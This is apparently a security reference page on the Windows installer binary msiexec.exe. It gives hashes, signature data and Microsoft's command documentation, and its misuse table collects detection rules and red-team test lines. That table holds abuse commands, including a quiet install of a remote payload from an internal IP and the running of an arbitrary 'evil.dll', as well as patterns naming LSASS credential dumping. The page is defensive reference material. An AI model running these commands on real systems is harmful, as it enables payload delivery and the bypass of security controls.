msiexec.exe

  • File Path: C:\Windows\SysWOW64\msiexec.exe
  • Description: Windows installer

Screenshot

msiexec.exe

Hashes

Type Hash
MD5 9D09DC1EDA745A5F87553048E57620CF
SHA1 1D0C7CFCA8104D06DE1F08B97F28B3520C246CD7
SHA256 3A90EDE157D40A4DB7859158C826F7B4D0F19A5768F6483C9BE6EE481C6E1AF7
SHA384 D735C0B7D639C98F2B853D0540F62A7BB2EE7DF377D9B07821062CF3E01B40F94520400B56B014BD8DF8E4884D0AB305
SHA512 2BE940F0468F77792C6E1B593376900C24FF0B0FAE8DC2E57B05596506789AA76119F8BE780C57252F74CD1F0C2FA7223FE44AE4FA3643C26DF00DD42BD4C016
SSDEEP 768:uo8HL2TB4LHLbo77Q2d9xSDvYD07BOUp8VKfTKznHVXq6ayYf3:vTB4LG7B8jY4XprIHw62
IMP E4E40938E4BF6C66424859ED02171C41
PESHA1 3631FA02746894561C6151FA554165C21DCF1ED6
PE256 81CA9B493C0C48D4D6F966981089A2D6DC86FDEDBD4C7FC5F62D6FCDEEA6839D

Runtime Data

Window Title:

Windows Installer

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\msiexec.exe.mui File
(R-D) C:\Windows\System32\en-US\msimsg.dll.mui File
(RW-) C:\Users\user File
(RW-) C:\Windows File
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_11b1e5df2ffd8627 File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\1\Windows\Theme1175649999 Section
\Windows\Theme601709542 Section

Loaded Modules:

Path
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\SysWOW64\msiexec.exe

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: msiexec.exe
  • Product Name: Windows Installer - Unicode
  • Company Name: Microsoft Corporation
  • File Version: 5.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 5.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/76
  • VirusTotal Link: https://www.virustotal.com/gui/file/3a90ede157d40a4db7859158c826f7b4d0f19a5768f6483c9be6ee481c6e1af7/detection

File Similarity (ssdeep match)

File Score
C:\Windows\SysWOW64\msiexec.exe 41
C:\WINDOWS\SysWOW64\msiexec.exe 50

Possible Misuse

The following table contains possible examples of msiexec.exe being misused. While msiexec.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\msiexec.exe' DRL 1.0
sigma win_firewall_as_add_rule.yml - 'C:\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma win_alert_lsass_access.yml - 'C:\Windows\System32\msiexec.exe' DRL 1.0
sigma win_alert_lsass_access.yml - 'C:\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\msiexec.exe' DRL 1.0
sigma file_event_win_cve_2021_41379_msi_lpe.yml description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file DRL 1.0
sigma file_event_win_cve_2021_41379_msi_lpe.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - https://twitter.com/SBousseaden/status/1388064061087260675 - rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml # - '\msiexec.exe' an installer installing a program using one of those DLL will raise an alert DRL 1.0
sigma image_load_suspicious_vss_ps_load.yml - '\msiexec.exe' DRL 1.0
sigma net_connection_win_msiexec.yml title: Msiexec Initiated Connection DRL 1.0
sigma net_connection_win_msiexec.yml Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. DRL 1.0
sigma net_connection_win_msiexec.yml Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) DRL 1.0
sigma net_connection_win_msiexec.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec DRL 1.0
sigma net_connection_win_msiexec.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma net_connection_win_msiexec.yml - Legitimate msiexec over networks DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml - 'C:\Windows\syswow64\MsiExec.exe' DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml - 'C:\Windows\System32\msiexec.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml - 'C:\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml - 'C:\Windows\System32\msiexec.exe' DRL 1.0
sigma proc_access_win_svchost_cred_dump.yml - '*\msiexec.exe' DRL 1.0
sigma proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml description: This rule looks for Windows Installer service (msiexec.exe) spawned command line and/or powershell DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml description: This rule looks for Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml - CommandLine\|endswith: '\system32\msiexec.exe /V' # ignore "repair option" DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml - ParentCommandLine\|endswith: '\system32\msiexec.exe /V' # ignore "repair option" DRL 1.0
sigma proc_creation_win_attrib_hiding_files.yml - msiexec.exe hiding desktop.ini DRL 1.0
sigma proc_creation_win_lolbins_by_office_applications.yml - 'msiexec' DRL 1.0
sigma proc_creation_win_lolbins_with_wmiprvse_parent_process.yml - 'msiexec' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml title: Suspicious Msiexec Execute Arbitrary DLL DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files\Bonjour\mdnsNSP.dll' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll' DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml title: Suspicious Msiexec Quiet Install DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - 'msiexec' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml - '*msiexec*' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_run_executable_invalid_extension.yml ParentImage\|endswith: ':\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma proc_creation_win_run_executable_invalid_extension.yml CommandLine\|startswith: 'C:\Windows\syswow64\MsiExec.exe -Embedding' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_susp_msiexec_cwd.yml title: Suspicious MsiExec Directory DRL 1.0
sigma proc_creation_win_susp_msiexec_cwd.yml description: Detects suspicious msiexec process starts in an uncommon directory DRL 1.0
sigma proc_creation_win_susp_msiexec_cwd.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml title: MsiExec Web Install DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml description: Detects suspicious msiexec process starts with web addresses as parameter DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml - ' msiexec' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\msiexec.exe' DRL 1.0
sigma registry_event_asep_reg_keys_modification_winsock2.yml - Image: 'C:\Windows\System32\MsiExec.exe' DRL 1.0
sigma registry_event_asep_reg_keys_modification_winsock2.yml - Image: 'C:\Windows\syswow64\MsiExec.exe' DRL 1.0
sigma registry_event_office_vsto_persistence.yml - '\msiexec.exe' DRL 1.0
sigma registry_event_ssp_added_lsa_config.yml - Image: C:\Windows\system32\msiexec.exe DRL 1.0
sigma registry_event_ssp_added_lsa_config.yml - Image: C:\Windows\syswow64\MsiExec.exe DRL 1.0
sigma registry_event_vbs_payload_stored.yml Image\|endswith: '\msiexec.exe' DRL 1.0
sigma sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml description: This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes DRL 1.0
sigma sysmon_always_install_elevated_parent_child_correlated.yml description: This rule will looks any process with low privilege launching Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege DRL 1.0
sigma sysmon_always_install_elevated_parent_child_correlated.yml Image\|endswith: '\msiexec.exe' DRL 1.0
LOLBAS Msiexec.yml Name: Msiexec.exe  
LOLBAS Msiexec.yml - Command: msiexec /quiet /i cmd.msi  
LOLBAS Msiexec.yml - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png  
LOLBAS Msiexec.yml - Command: msiexec /y "C:\folder\evil.dll"  
LOLBAS Msiexec.yml - Command: msiexec /z "C:\folder\evil.dll"  
LOLBAS Msiexec.yml - Path: C:\Windows\System32\msiexec.exe  
LOLBAS Msiexec.yml - Path: C:\Windows\SysWOW64\msiexec.exe  
LOLBAS Msiexec.yml - IOC: msiexec.exe retrieving files from Internet  
LOLBAS Msiexec.yml - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/  
atomic-red-team index.md - T1218.007 Msiexec MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1218.007 Msiexec MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Scheduled Task | Thread Execution Hijacking CONTRIBUTE A TEST | Msiexec | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Security Support Provider | Token Impersonation/Theft | Msiexec | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1047.md msiexec /i PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi /qn /norestart MIT License. © 2018 Red Canary
atomic-red-team T1072.md msiexec /i “#{radmin_installer}” /qn MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md # T1218.007 - Msiexec MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md <blockquote>Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md - Atomic Test #1 - Msiexec.exe - Execute Local MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md - Atomic Test #2 - Msiexec.exe - Execute Remote MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md - Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #1 - Msiexec.exe - Execute Local MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md msiexec.exe /q /i “#{msi_payload}” MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md msiexec.exe /y “#{dll_payload}” MIT License. © 2018 Red Canary
atomic-red-team T1219.md Msiexec will be used to quietly insall ScreenConnect. MIT License. © 2018 Red Canary
atomic-red-team T1219.md msiexec /i $installer /qn MIT License. © 2018 Red Canary
atomic-red-team T1219.md msiexec /x $installer /qn MIT License. © 2018 Red Canary
atomic-red-team T1555.003.md msiexec /i $installer /qn MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md msiexec /x #{msi_file_path} /qn MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md msiexec /i #{msi_file_path} /qn MIT License. © 2018 Red Canary
signature-base apt_apt29_nobelium_may21.yar Not shared publicly: rules for CobaltStrike loader samples, ISOs, specifc msiexec method found in some samples CC BY-NC 4.0
signature-base apt_blackenergy.yar $s2 = “msiexec.exe” fullword wide CC BY-NC 4.0
signature-base apt_win_plugx.yar $s2 = “%s\msiexec.exe %d %d” fullword wide CC BY-NC 4.0
signature-base apt_win_plugx.yar $s4 = “%s\msiexec.exe UAC” fullword wide CC BY-NC 4.0
signature-base thor-hacktools.yar $x1 = “msiexec /f c:\users\%username%\downloads\” fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s2 = “Full path: C:\Windows\system32\msiexec.exe /V” fullword wide CC BY-NC 4.0
stockpile 60f63260-39bb-4136-87a0-b6c2dca799fc.yml Start-Process msiexec.exe -ArgumentList "/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1" -Wait; Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


msiexec

Provides the means to install, modify, and perform operations on Windows Installer from the command line.

Install options

Set the install type for launching an installation package.

Syntax

msiexec.exe [/i][/a][/j{u|m|/g|/t}][/x] <path_to_package>
Parameters
Parameter Description
/i Specifies normal installation.
/a Specifies administrative installation.
/ju Advertise the product to the current user.
/jm Advertise the product to all users.
/j/g Specifies the language identifier used by the advertised package.
/j/t Applies transform to the advertised package.
/x Uninstalls the package.
<path_to_package> Specifies the location and name of the installation package file.
Examples

To install a package named example.msi from the C: drive, using a normal installation process, type:

msiexec.exe /i "C:\example.msi"

Display options

You can configure what a user sees during the installation process, based on your target environment. For example, if you’re distributing a package to all clients for manual installation, there should be a full UI. However, if you’re deploying a package using Group Policy, which requires no user interaction, there should be no UI involved.

Syntax

msiexec.exe /i <path_to_package> [/quiet][/passive][/q{n|b|r|f}]
Parameters
Parameter Description
<path_to_package> Specifies the location and name of the installation package file.
/quiet Specifies quiet mode, which means there’s no user interaction required.
/passive Specifies unattended mode, which means the installation only shows a progress bar.
/qn Specifies there’s no UI during the installation process.
/qn+ Specifies there’s no UI during the installation process, except for a final dialog box at the end.
/qb Specifies there’s a basic UI during the installation process.
/qb+ Specifies there’s a basic UI during the installation process, including a final dialog box at the end.
/qr Specifies a reduced UI experience during the installation process.
/qf Specifies a full UI experience during the installation process.
Remarks
  • The modal box isn’t shown if the installation is cancelled by the user. You can use qb+! or qb!+ to hide the CANCEL button.
Examples

To install package C:\example.msi, using a normal installation process and no UI, type:

msiexec.exe /i "C:\example.msi" /qn

Restart options

If your installation package overwrites files or attempts to change files that are in use, a reboot might be required before the installation completes.

Syntax

msiexec.exe /i <path_to_package> [/norestart][/promptrestart][/forcerestart]
Parameters
Parameter Description
<path_to_package> Specifies the location and name of the installation package file.
/norestart Stops the device from restarting after the installation completes.
/promptrestart Prompts the user if a reboot is required.
/forcerestart Restarts the device after the installation completes.
Examples

To install package C:\example.msi, using a normal installation process with no reboot at the end, type:

msiexec.exe /i "C:\example.msi" /norestart

Logging options

If you need to debug your installation package, you can set the parameters to create a log file with specific information.

Syntax

msiexec.exe [/i][/x] <path_to_package> [/L{i|w|e|a|r|u|c|m|o|p|v|x+|!|*}] <path_to_log>
Parameters
Parameter Description
/i Specifies normal installation.
/x Uninstalls the package.
<path_to_package> Specifies the location and name of the installation package file.
/li Turns on logging and includes status messages in the output log file.
/lw Turns on logging and includes non-fatal warnings in the output log file.
/le Turns on logging and includes all error messages in the output log file.
/la Turns on logging and includes information about when an action started in the output log file.
/lr Turns on logging and includes action-specific records in the output log file.
/lu Turns on logging and includes user request information in the output log file.
/lc Turns on logging and includes the initial UI parameters in the output log file.
/lm Turns on logging and includes out-of-memory or fatal exit information in the output log file.
/lo Turns on logging and includes out-of-disk-space messages in the output log file.
/lp Turns on logging and includes terminal properties in the output log file.
/lp Turns on logging and includes terminal properties in the output log file.
/lv Turns on logging and includes verbose output in the output log file.
/lp Turns on logging and includes terminal properties in the output log file.
/lx Turns on logging and includes extra debugging information in the output log file.
/l+ Turns on logging and appends the information to an existing log file.
/l! Turns on logging and flushes each line to the log file.
/l* Turns on logging and logs all information, except verbose information (/lv) or extra debugging information (/lx).
<path_to_logfile> Specifies the location and name for the output log file.
Examples

To install package C:\example.msi, using a normal installation process with all logging information provided, including verbose output, and storing the output log file at C:\package.log, type:

msiexec.exe /i "C:\example.msi" /L*V "C:\package.log"

Update options

You can apply or remove updates using an installation package.

Syntax

msiexec.exe [/p][/update][/uninstall[/package<product_code_of_package>]] <path_to_package>
Parameters
Parameter Description
/p Installs a patch. If you’re installing silently, you must also set the REINSTALLMODE property to ecmus and REINSTALL to ALL. Otherwise, the patch only updates the MSI cached on the target device.
/update Install patches option. If you’re applying multiple updates, you must separate them using a semi-colon (;).
/package Installs or configures a product.
Examples
msiexec.exe /p "C:\MyPatch.msp"
msiexec.exe /p "C:\MyPatch.msp" /qb REINSTALLMODE="ecmus" REINSTALL="ALL"
msiexec.exe /update "C:\MyPatch.msp"
msiexec.exe /uninstall {1BCBF52C-CD1B-454D-AEF7-852F73967318} /package {AAD3D77A-7476-469F-ADF4-04424124E91D}

Where the first GUID is the patch GUID, and the second one is the MSI product code to which the patch was applied.

Repair options

You can use this command to repair an installed package.

Syntax

msiexec.exe [/f{p|o|e|d|c|a|u|m|s|v}] <product_code>
Parameters
Parameter Description
/fp Repairs the package if a file is missing.
/fo Repairs the package if a file is missing, or if an older version is installed.
/fe Repairs the package if file is missing, or if an equal or older version is installed.
/fd Repairs the package if file is missing, or if a different version is installed.
/fc Repairs the package if file is missing, or if checksum does not match the calculated value.
/fa Forces all files to be reinstalled.
/fu Repairs all the required user-specific registry entries.
/fm Repairs all the required computer-specific registry entries.
/fs Repairs all existing shortcuts.
/fv Runs from source and re-caches the local package.
Examples

To force all files to be reinstalled based on the MSI product code to be repaired, {AAD3D77A-7476-469F-ADF4-04424124E91D}, type:

msiexec.exe /fa {AAD3D77A-7476-469F-ADF4-04424124E91D}

Set public properties

You can set public properties through this command. For information about the available properties and how to set them, see Public Properties.

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.